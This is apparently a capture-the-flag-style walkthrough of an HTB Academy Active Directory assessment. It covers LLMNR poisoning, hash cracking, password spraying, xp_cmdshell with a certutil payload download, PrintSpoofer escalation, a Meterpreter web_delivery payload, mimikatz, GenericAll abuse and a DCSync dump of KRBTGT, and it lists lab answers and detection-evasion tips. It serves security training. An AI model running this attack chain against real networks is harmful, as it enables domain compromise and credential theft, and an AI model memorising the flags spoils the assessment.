🚀Skills Assessment Part II - Advanced Professional Methodology

🏆 HTB Academy: Advanced Assessment with Superior Pivoting

📍 Overview

Skills Assessment Part II demonstrates advanced Active Directory penetration testing using SUPERIOR pivoting methodology with SSH dynamic port forwarding and proxychains. This approach is significantly simpler and more reliable than complex Meterpreter pivoting while providing professional-grade results.

🎯 Assessment Scope: 12 progressive questions covering LLMNR poisoning, credential hunting, SQL exploitation, privilege escalation, and domain compromise.

🔥 Key Innovation: Using ssh -D 9050 + proxychains instead of Meterpreter SOCKS proxy for seamless pivoting.

🌐 Professional Pivoting Setup - The Game Changer

🚀 SSH Dynamic Port Forwarding (SUPERIOR METHOD)

# Connect to jump box with SOCKS proxy:
ssh htb-student@TARGET_IP -D 9050

# Configure proxychains:
sudo nano /etc/proxychains4.conf
# Add: socks5 127.0.0.1 9050

# Now ALL tools work through proxy seamlessly:
proxychains impacket-wmiexec user:pass@internal_ip
proxychains xfreerdp /v:internal_ip /u:user /p:pass
proxychains crackmapexec smb internal_network

💡 Why This Method is SUPERIOR:

✅ SSH -D + Proxychains Advantages:

One simple command - no complex Meterpreter setup
Automatic tool compatibility - works with impacket, crackmapexec, xfreerdp
Stable connections - SSH is more reliable than Meterpreter sessions
Professional standard - real pentesting methodology
No port conflicts - single SOCKS proxy handles everything
Easy troubleshooting - simple SSH connection management

❌ Meterpreter Pivoting Disadvantages:

Complex multi-step setup (autoroute + socks_proxy)
Tool compatibility issues (CrackMapExec parsing problems)
Session instability and frequent drops
Port conflict management
Multiple background jobs to maintain

🎫 Question 1: LLMNR Poisoning

🎯 Task: "Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?"

📋 Solution Steps:

Step 1: Connect to Jump Box

# SSH to ParrotOS jump box:
ssh htb-student@TARGET_IP

Step 2: Run Responder for LLMNR Poisoning

# Capture NTLM hashes via LLMNR/NBT-NS poisoning:
sudo responder -I ens224 -wrfv

# Wait for automatic hash capture:
# [SMB] NTLMv2-SSP Client   : 172.16.7.3
# [SMB] NTLMv2-SSP Username : INLANEFREIGHT\AB920
# [SMB] NTLMv2-SSP Hash     : AB920::INLANEFREIGHT:6741b51d529201c7:F8653C1E3120B191A7DA708C0E363F8B:...

🎯 Answer: AB920

🔑 Question 2: Hash Cracking

🎯 Task: "What is this user's cleartext password?"

📋 Solution Steps:

Step 1: Extract and Format Hash

# Save hash to file:
echo 'AB920::INLANEFREIGHT:6741b51d529201c7:f8653c1e3120b191a7da708c0e363f8b:...' > AB920_ntlmv2

Step 2: Crack with Hashcat

# Crack NetNTLMv2 hash:
hashcat -m 5600 AB920_ntlmv2 /usr/share/wordlists/rockyou.txt

# Result: AB920:weasal

🎯 Answer: weasal

🌐 Question 3: Initial Pivot Access

🎯 Task: "Submit the contents of the C:\flag.txt file on MS01."

📋 Solution Steps:

Step 1: Network Discovery

# Discover internal hosts:
sudo nmap -p 88,445,3389 --open 172.16.7.0/24

# Results:
# 172.16.7.3  - DC (Kerberos, SMB)
# 172.16.7.50 - MS01 (SMB, RDP)
# 172.16.7.60 - SQL01 (SMB)

Step 2: Setup Superior Pivoting Infrastructure

# 🔥 GAME CHANGER: SSH Dynamic Port Forwarding
ssh htb-student@JUMP_BOX_IP -D 9050

# Configure proxychains:
sudo nano /etc/proxychains4.conf
# Add: socks5 127.0.0.1 9050

Step 3: RDP Through Proxy

# Connect to MS01 via proxychains (SEAMLESS!):
proxychains xfreerdp /v:172.16.7.50 /u:AB920 /p:weasal

# Alternative: SSH tunnel method:
ssh -L 3389:172.16.7.50:3389 htb-student@JUMP_BOX_IP
xfreerdp /v:localhost /u:AB920 /p:weasal

Step 4: Retrieve Flag

# In RDP session:
type C:\flag.txt

🎯 Answer: Contents of flag.txt

👤 Question 4: Advanced User Enumeration

🎯 Task: "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain."

📋 Solution Steps:

Step 1: BloodHound Domain Survey

# Comprehensive AD enumeration:
proxychains bloodhound-python -d INLANEFREIGHT.LOCAL -ns 172.16.7.3 -c All -u AB920 -p weasal

Step 2: Download Tools to Jump Box

# Download required tools:
wget -q https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget -q https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_amd64.exe

# Transfer to jump box:
scp PowerView.ps1 htb-student@JUMP_BOX_IP:/home/htb-student/Desktop
scp kerbrute_windows_amd64.exe htb-student@JUMP_BOX_IP:/home/htb-student/Desktop

Step 3: User List Generation (In RDP)

# On MS01 via RDP:
cd .\Desktop\
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\PowerView.ps1

# Generate domain user list:
Get-DomainUser * | Select-Object -ExpandProperty samaccountname | Foreach {$_.TrimEnd()} | Set-Content adusers.txt

Step 4: Password Spraying

# Password spray with Kerbrute:
.\kerbrute_windows_amd64.exe passwordspray -d INLANEFREIGHT.LOCAL .\adusers.txt Welcome1

# Result: [+] VALID LOGIN: BR086@INLANEFREIGHT.LOCAL:Welcome1

🎯 Answer: BR086

🔐 Question 5: Password Discovery

🎯 Task: "What is this user's password?"

From Kerbrute output: BR086:Welcome1

🎯 Answer: Welcome1

📁 Question 6: Configuration File Hunting

🎯 Task: "Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?"

📋 Solution Steps:

Step 1: Download Snaffler

# Download file hunting tool:
wget -q https://github.com/SnaffCon/Snaffler/releases/download/1.0.16/Snaffler.exe
scp Snaffler.exe htb-student@JUMP_BOX_IP:/home/htb-student/Desktop

Step 2: Run as BR086 User

# In RDP session, escalate context:
runas /netonly /user:INLANEFREIGHT\BR086 powershell
# Password: Welcome1

# Hunt for sensitive files:
cd C:\users\AB920\Desktop
.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data

Step 3: Extract SQL Credentials

# Snaffler output reveals:
# File: \\DC01.INLANEFREIGHT.LOCAL\Department Shares\IT\Private\Development\web.config
# Contains: connectionString="...;User ID=netdb;Password=D@ta_bAse_adm1n!"

🎯 Answer: D@ta_bAse_adm1n!

🗄️ Question 7: SQL Server Exploitation

🎯 Task: "Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host."

📋 Solution Steps:

Step 1: SQL Server Access

# Connect via proxychains (SEAMLESS!):
proxychains mssqlclient.py netdb:'D@ta_bAse_adm1n!'@172.16.7.60

Step 2: Enable Command Execution

-- Enable xp_cmdshell:
enable_xp_cmdshell

-- Check privileges:
xp_cmdshell whoami /priv
-- Result: SeImpersonatePrivilege Enabled

Step 3: Privilege Escalation with PrintSpoofer

# Download PrintSpoofer:
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

# Serve from jump box:
python3 -m http.server 9000

# Download to target:
xp_cmdshell certutil -urlcache -split -f "http://172.16.7.240:9000/PrintSpoofer64.exe" c:\windows\temp\PrintSpoofer64.exe

# Reset admin password:
xp_cmdshell c:\windows\temp\PrintSpoofer64.exe -c "net user administrator Welcome1"

Step 4: Retrieve Flag

# Access via SMB:
proxychains smbclient -U "administrator" \\\\172.16.7.60\\C$
# Password: Welcome1
cd Users\Administrator\Desktop\
get flag.txt

🎯 Answer: s3imp3rs0nate_cl@ssic

🔄 Question 8: Advanced Lateral Movement

🎯 Task: "Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host."

📋 Solution Steps:

Step 1: Meterpreter Setup (Alternative Method)

# Setup web_delivery from jump box:
sudo msfconsole -q
use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_tcp
set TARGET 2
set SRVHOST 172.16.7.240
set LHOST 172.16.7.240
exploit

Step 2: Execute via PrintSpoofer

-- From SQL session, execute encoded payload:
xp_cmdshell c:\windows\temp\PrintSpoofer64.exe -c "powershell.exe -nop -w hidden -e [ENCODED_PAYLOAD]"

Step 3: Credential Extraction

# Upload mimikatz via meterpreter:
upload mimikatz64.exe

# Extract credentials:
mimikatz64.exe
privilege::debug
sekurlsa::logonpasswords

# Result: mssqlsvc:Sup3rS3cur3maY5ql$3rverE

Step 4: Alternative with CrackMapExec (SUPERIOR!)

# 🔥 Much simpler with proxychains + CME:
proxychains crackmapexec smb 172.16.7.60 -u administrator -p Welcome1 --local-auth --lsa

# Reveals cleartext: mssqlsvc:Sup3rS3cur3maY5ql$3rverE

Step 5: Access MS01

# RDP to MS01 as mssqlsvc:
proxychains xfreerdp /v:172.16.7.50 /u:mssqlsvc /p:'Sup3rS3cur3maY5ql$3rverE'

# Read flag from C:\Users\Administrator\Desktop\flag.txt

🎯 Answer: eexc3ss1ve_adm1n_r1ights!

🕸️ Question 9: Advanced Poisoning

🎯 Task: "Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?"

📋 Solution Steps:

Step 1: Setup Inveigh Poisoning

# Download Inveigh:
wget -q https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1
scp Inveigh.ps1 htb-student@JUMP_BOX_IP:/home/htb-student/Desktop

Step 2: Execute Poisoning Campaign

# In RDP session on MS01:
Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

# Captured hash:
# CT059::INLANEFREIGHT:F8059BA109C97E0D:78A41190201430E8654DE55727DF7EB5:...

🎯 Answer: CT059

🔓 Question 10: Advanced Hash Cracking

🎯 Task: "Crack this user's password hash and submit the cleartext password as your answer."

📋 Solution Steps:

# Crack CT059 hash:
hashcat -m 5600 CT059_hash /usr/share/wordlists/rockyou.txt

# Result: CT059:charlie1

🎯 Answer: charlie1

👑 Question 11: Domain Compromise

🎯 Task: "Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host."

📋 Solution Steps:

Step 1: Access as CT059

# RDP as CT059:
proxychains xfreerdp /v:172.16.7.50 /u:CT059 /p:charlie1

Step 2: Abuse GenericAll Rights

# CT059 has GenericAll over Domain Admins group
# Reset domain admin password:
net user administrator Welcome1 /domain

Step 3: Domain Controller Access

# Access DC01 as domain admin:
proxychains impacket-wmiexec administrator:Welcome1@172.16.7.3

# Retrieve flag:
type C:\Users\administrator\desktop\flag.txt

🎯 Answer: acLs_f0r_th3_w1n!

🏆 Question 12: DCSync Attack

🎯 Task: "Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise."

📋 Solution Steps:

# DCSync KRBTGT hash:
proxychains impacket-secretsdump administrator:Welcome1@172.16.7.3 -just-dc-user KRBTGT

# Output:
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7eba70412d81c1cd030d72a3e8dbe05f:::

🎯 Answer: 7eba70412d81c1cd030d72a3e8dbe05f

🛠️ Professional Methodology Comparison

🔥 Superior Approach: SSH -D + Proxychains

Setup:

# Single command setup:
ssh htb-student@jump_box -D 9050

# Configure once:
echo "socks5 127.0.0.1 9050" >> /etc/proxychains4.conf

Usage:

# ALL tools work seamlessly:
proxychains impacket-wmiexec user:pass@target
proxychains crackmapexec smb target_range
proxychains xfreerdp /v:target /u:user /p:pass
proxychains secretsdump.py user:pass@target

🔧 Why CrackMapExec + Impacket > Meterpreter

✅ CrackMapExec/Impacket Advantages:

Native SMB/RPC protocols - better compatibility
Built-in credential extraction - no separate tools needed
Proxy-friendly - works flawlessly with proxychains
Professional standard - real-world pentesting tools
Comprehensive coverage - all AD attack vectors
Reliable output - consistent results

✅ Specific Tool Benefits:

CrackMapExec:

# Credential extraction:
crackmapexec smb target -u user -p pass --lsa
crackmapexec smb target -u user -p pass --sam
crackmapexec smb target -u user -p pass --ntds

# Lateral movement:
crackmapexec smb target -u user -p pass -x "command"
crackmapexec smb target -u user -p pass --exec-method wmiexec

Impacket Suite:

# Comprehensive attack tools:
impacket-secretsdump    # DCSync, credential extraction
impacket-wmiexec       # Lateral movement
impacket-psexec        # Service-based shells
impacket-smbexec       # SMB-based shells
impacket-GetUserSPNs   # Kerberoasting
impacket-mssqlclient   # SQL Server attacks

🎯 Professional Skills Demonstrated

🏆 Advanced Techniques:

LLMNR/NBT-NS Poisoning - Passive credential harvesting
Password Spraying - Systematic weak credential discovery
File Hunting - Sensitive data discovery with Snaffler
SQL Server Exploitation - Database server compromise
Privilege Escalation - PrintSpoofer SeImpersonatePrivilege abuse
Credential Extraction - Memory-based credential harvesting
ACL Abuse - GenericAll rights exploitation
DCSync Attacks - Domain replication abuse
Lateral Movement - Multi-host compromise chain

🔧 Methodology Excellence:

Superior Pivoting - SSH dynamic forwarding vs Meterpreter
Tool Integration - Seamless proxychains compatibility
Professional Workflow - Real-world pentesting approach
Troubleshooting - Stable connection management
Efficiency - Streamlined attack execution

💡 Key Insights & Best Practices

🎯 Pivoting Revolution:

# OLD WAY (Complex, Unreliable):
msfconsole → web_delivery → meterpreter → autoroute → socks_proxy → tool compatibility issues

# NEW WAY (Simple, Professional):
ssh -D 9050 → proxychains → ALL TOOLS WORK

🔥 Professional Advantages:

Simplicity - One command vs multi-step setup
Reliability - SSH stability vs Meterpreter sessions
Compatibility - Universal tool support
Troubleshooting - Easy connection management
Speed - Immediate productivity
Professional - Real-world methodology

🛡️ Detection Evasion:

SSH tunnels appear as normal administrative traffic
Native tools blend with legitimate AD activity
Credential extraction using built-in protocols
Minimal footprint compared to Meterpreter

🏆 This Skills Assessment demonstrates the evolution from complex exploitation frameworks to streamlined professional methodology - SSH dynamic port forwarding + proxychains + native AD tools = the ultimate pentesting approach!

PreviousSkills Assessment Part I - Complete Walkthrough NextRemote Management

Last updated 5 months ago